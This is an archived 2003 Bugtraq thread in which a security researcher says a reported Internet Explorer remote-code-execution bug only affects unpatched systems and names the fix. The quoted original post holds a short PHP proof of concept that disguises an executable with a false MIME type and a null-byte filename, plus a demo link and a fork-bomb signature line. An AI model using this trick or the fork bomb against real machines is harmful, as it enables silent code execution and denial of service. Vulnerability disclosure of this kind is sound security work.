[32121] in bugtraq

home help back first fref pref prev next nref lref last post

RE: IE remote code execution

daemon@ATHENA.MIT.EDU (Thor Larholm)
Tue Oct 21 11:09:39 2003

MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
content-class: urn:content-classes:message
Date: Mon, 20 Oct 2003 11:42:35 -0700
Message-ID: <8B32EDC90D8F4E4AB40918883281874D0BADE4@pivxwin2k1.secnet.pivx.com>
From: "Thor Larholm" <thor@pivx.com>
To: "Marcin Ulikowski" <r3b00t@tx.pl>, <bugtraq@securityfocus.com>
Content-Transfer-Encoding: 8bit

A default Windows 98SE installation is several years behind in patches.

This does not reproduce on any IE browser that has been patched the last
year or so.

If in doubt about your IE patch level apply the latest cumulative patch
MS03-040, which can be found at

http://www.microsoft.com/technet/security/bulletin/MS03-040.asp


Regards
Thor Larholm
PivX Solutions, LLC - Senior Security Researcher
http://pivx/com/larholm/ - Get our research, join our mailinglist

-----Original Message-----
From: Marcin Ulikowski [mailto:r3b00t@tx.pl] 
Sent: Saturday, October 18, 2003 3:16 PM
To: bugtraq@securityfocus.com
Subject: IE remote code execution


This code can execute any code remotely using IE - as  you can see very
simple.

// for IE 5, tested on default Windows 98SE installation
<?php
Header("Content-type: audio/midi");
Header("Content-Disposition: inline; filename=readme.txt%00code.exe");
readfile("code.exe"); ?> <noscript>

Here you have a demo:
http://r3b00t.tx.pl/iexec5.php

Can we expect more surprises like this one?

--
------------------------------
r3b00t ~ [http://r3b00t.tx.pl]
just do main(){for(;;)fork();}
------------------------------


home help back first fref pref prev next nref lref last post